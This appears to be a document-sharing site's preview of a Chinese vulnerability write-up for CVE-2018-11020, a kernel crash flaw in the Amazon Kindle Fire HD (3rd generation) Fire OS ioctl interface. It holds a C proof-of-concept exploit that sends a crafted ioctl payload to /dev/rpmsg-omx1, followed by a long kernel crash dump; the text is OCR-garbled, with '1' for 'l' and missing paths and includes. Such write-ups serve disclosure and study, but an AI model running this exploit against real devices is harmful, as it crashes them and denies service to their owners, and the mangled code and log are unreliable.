收藏
下载资源 加入VIP,免费下载

(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:lao****ou 文档编号:794871 上传时间:2024-05-25 格式:DOCX 页数:10 大小:37.99KB
下载 相关 举报
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共10页
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共10页
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共10页
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共10页
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共10页
亲,该文档总共10页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在第一文库网上搜索。

1、(CVE-2018-11020)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversrpmsgrpmsg_omx.c允许攻击者通过设备文件/dev/rpmsg上的ioct1的参数注入特制的参数使用命令3221772291的omx1,并导致内核崩溃。要探索此漏洞,必须打开设备文件devrpmsg-omx1,并使用命令3221772291和精心设计的有效负载作为第三个参数来对该设备文件进行ioct1系统调用。二、漏洞影响FireOS4.5.5.

2、3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevrpmsg-omx1causesthesystemcrashviaIOCT13221772291.* Re1atedbuggystructnameisgcicommit.* ThisPocshou1drunwithpermissiontodoioct1ondevrpmsg-om1.* Thefow11wingiskmsgofkerne1crashinfomation:*/#inc1ude#inc1ude#inc1ude#inc1udeco

3、nststaticchar*driver=devrpmsg-omx1;staticcommand=3221772291;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xb5d18de2,0f6e48a17j09179c429,089a32e03;intfd=0;fd=open(driverjO_RDWR);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0%x.n,driver,command);printf(Systemwi11crashandreboot.n)

4、;if(ioct1(fdjcommand,Spay1oad)/data/IOCaItmp1og);return-1;c1ose(fd);return0;崩溃日志146.290710Unab1etohand1ekerne1pagingrequestatvirtua1addressb5d18de6146.299438pgd=d72dc000146.302795b5d18de6*pgd=00000000146.307281Interna1error:Oops:5#1PREEMPTSMPARM146.313232Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogg

5、en(0)146.320983CPU:0Tainted:GO(3.4.83-gd2afc0bae69#1)146.328308PCisation_free+0xc0xb4146.3326721Risatrpmsg_omx_ioct1+0x2cc/0x598146.337890pc:Ir:psr:60000013146.337890sp:c35b5e60ip:c35b5e80fp:c35b5e7c146.350860r10:c35b5ea8r9:de88c4d8r8:c35b4000f8146.356872r7:dd32b580r6:00000003r5:d71d5880r4:be92f5001

6、46.364135r3:d71d58ecr2:d71d58ecr1:b5d18de2r0:d7aaaa146.371551F1ags:nZCvIRQsonFIQsonModeSVC_32ISAARMSegmentuser146.379516Contro1:10c5387dTab1e:972dc04aDAC:00000015146.386077146.386077PC:0xc02e84c0:146.39105284c00a000001058e2433001e5853058e2871010ebfddc25e1a00006eb0ee904e5953146.40158084e0e353000003fe

7、285005ce5933cba000011Ia0009e1a0200de3c23d7fe3c33146.4122928500e593723c006eb0ee876e1a00005e1a01007ebf90a76e597321ce585306ce1a00146.4228218520ebffffb400de92dd878e24cb004e1a00004ebf8e011e89da8f0e7f001f2e1a0c146.4335028540e5915004006eb0ee8e2e5953010e1a04001e15500001a000021e2856014e1a00146.4441838560e353

8、0000008e353000090a000005e243200ce15400022a00000ae5933146.4548648580e59f0054e3001219006eb0ee856e89da878e59f2050e59f3050ebf58268e1a00146.46539385a0859330048affffedf93e3320000Iafffffa146.476074146.4760741R:0c048a0a0:f57ff05fe1943f9fe2433001e1842146.481048a0a033a03000e3530000008e1a0000aebf7305eIaffffaee

9、24ba05ce1a01004e3a02146.491729a0c0e3500000Iaffffaa000e50b005c0a000001e5950068e51b1058ebf97677e3500146.502380a0e0e3700a019affffc8018eaffff8ee1a00004e3a03000e50b305ceaffffc5e3e00146.513061a100e1a0100ae3a02008fc2e5950068ebf97904ebf73154e35000000affff88eafff146.523590a120eaffffb9e24b005c03ce1a03006e58d2

10、000e3a01030ebf7398be3a02030e5970146.534240a140e59f1280e59f2274004e7933101e3530000ebf99069e3e0000deaffff78e5933146.544921a1600affff6ce5950068a018a00001fe5950068ebf97651e25090000a000021e3790146.555603a180e1a01009e24b206405c0affff9be59f322c146.566131146.566131SP:0xc35b5de0:e24b3060ebf97447e3500000050b9

11、146.5712285de000000004d8cc50f454060000013ffffffff600100130000000100000001c02e8146.5817875e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.5924375e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6031185e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C

12、048a120C02e8146.6138305e60d71d58ecbe92f5f8e80C048a120C02e8540d71d588000000003c35b5f04c35b5146.6243895e80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.6350705ea0C00723a0000fffff00100000000C35b5f14b5d18de2f6e48a170000000200000146.6455995ec00000000000000001ee0c02089fc00000000146.6

13、56158146.656158IP:0xc35b5e00:de88c4d8c25d7c00c35b5efcc35b5146.6612545e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.6719365e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6824955e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C048a120C02e8146.6931

14、765e60d71d58ecbe92f5f8d71d588000000003c35b5f04c35b5e80C048a120C02e8540146.703704Se80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.7142635ea0C00723a0000fffff00100000000c35b5f14b5d18de2f6e48a170000000200000146.7249145ec00000000000000001ee0c02089fc00000000de88c4d8c25d7c00c35b5efcc35b5146.7355955ee0d72400c000000004000C35b5f74C35b

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服